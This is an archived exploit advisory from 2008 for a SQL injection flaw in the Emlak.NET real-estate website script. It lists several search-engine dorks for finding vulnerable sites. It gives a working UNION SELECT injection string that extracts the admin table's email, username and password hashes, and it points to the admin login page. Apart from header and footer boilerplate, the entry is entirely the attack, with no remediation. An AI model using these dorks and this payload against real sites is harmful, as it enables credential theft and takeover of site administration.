Topic : | Com Endeavors(Real Estate)Emlak.NET SQL injection Vulnerability
|
ExploitAlert : 3589
Credit : S@BUN
Date : 22.03.2008
Download
Plain text version
 Exploit Code : ##########################################
#
# Powered by Com Endeavors(Real Estate)Emlak.NET SQL injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "index.php?go=detail"
#
# DORK 2 : allinurl: "Powered by Com Endeavors"
#
# DORK 3 : "Emlak NET Kiralık ve Satılık Emlak Sitesi"
#
*****ALL DORKS******
allinurl: "index php go buy"
allinurl: "index.php?go=sell"
allinurl: "index php go linkdir"
allinurl: "index.php?go=resource_center"
allinurl: "resource_center.html"
allinurl: "index.php?go=properties"
allinurl: "index.php?go=register"
###########################################
EXPLOIT :
index.php
?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0
x3a,concat(username,0x3a,password),1,1,1,1,1,1,2,2,2,2,2/**/from/**/admin/*
where,limit,2--
#####admin panel login:
#####admin/login.php
###########################################
------------------S@BUN--------------------
###########################################
-----hackturkiye.hackturkiye@gmail.com-----
###########################################
--http://my.opera.com/SQL-Injection/blog/--
###########################################
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|